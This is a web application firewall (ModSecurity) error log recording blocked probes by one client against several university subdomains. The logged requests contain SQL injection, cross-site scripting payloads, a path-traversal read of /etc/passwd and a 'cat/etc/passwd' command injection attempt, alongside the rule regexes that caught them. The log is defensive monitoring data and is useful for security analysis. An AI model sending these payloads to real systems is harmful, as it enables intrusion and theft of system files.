[Tue Aug 29 11:47:20.596401 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14WMCo-f0AAAjM7EQAAAAT"]
[Tue Aug 29 11:47:22.421326 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAkAL6IAAAAU"]
[Tue Aug 29 11:47:22.422078 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAj@-ucAAAAI"]
[Tue Aug 29 11:47:22.445323 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAkBKlcAAAAb"]
[Tue Aug 29 11:47:22.449616 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAhT3-4AAAAD"]
[Tue Aug 29 11:47:22.587740 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAhT4AAAAAAD"]
[Tue Aug 29 11:47:23.363771 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjZRZ0AAAAS"]
[Tue Aug 29 11:47:23.382414 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAkBKlsAAAAb"]
[Tue Aug 29 11:47:23.387023 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjrbHoAAAAP"]
[Tue Aug 29 11:47:23.426560 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjrbHwAAAAP"]
[Tue Aug 29 11:47:23.430792 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjZRaAAAAAS"]
[Tue Aug 29 11:47:23.512257 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO14W8Co-f0AAAjZRaQAAAAS"]
[Tue Aug 29 11:47:24.375063 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14XMCo-f0AAAjrbIIAAAAP"]
[Tue Aug 29 11:47:25.370861 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhT4AcAAAAD"]
[Tue Aug 29 11:47:25.371627 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhui8sAAAAr"]
[Tue Aug 29 11:47:25.396596 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAj114sAAAAa"]
[Tue Aug 29 11:47:25.425614 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhzvr0AAAAx"]
[Tue Aug 29 11:47:25.444363 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhT4AgAAAAD"]
[Tue Aug 29 11:47:25.444568 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhui80AAAAr"]
[Tue Aug 29 11:47:25.445366 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAhzvr4AAAAx"]
[Tue Aug 29 11:47:25.467499 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAjZRagAAAAS"]
[Tue Aug 29 11:47:25.468002 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAhzvr8AAAAx"]
[Tue Aug 29 11:47:25.480359 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAjL8UEAAAAR"]
[Tue Aug 29 11:47:26.384744 2023] [:error] [pid 2303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAj-eTQAAAAE"]
[Tue Aug 29 11:47:26.385728 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjZRawAAAAS"]
[Tue Aug 29 11:47:26.387026 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XsCo-f0AAAjCbGcAAAAB"]
[Tue Aug 29 11:47:26.401058 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjdQOcAAAAZ"]
[Tue Aug 29 11:47:26.409182 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjtc1MAAAAX"]
[Tue Aug 29 11:47:26.414098 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAi@TD8AAAAM"]
[Tue Aug 29 11:47:27.366369 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14X8Co-f0AAAfECD4AAAAO"]
[Tue Aug 29 11:47:27.396456 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAhzvsIAAAAx"]
[Tue Aug 29 11:47:27.409413 2023] [:error] [pid 2303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAj-eTkAAAAE"]
[Tue Aug 29 11:47:27.410880 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAjIhp4AAAAJ"]
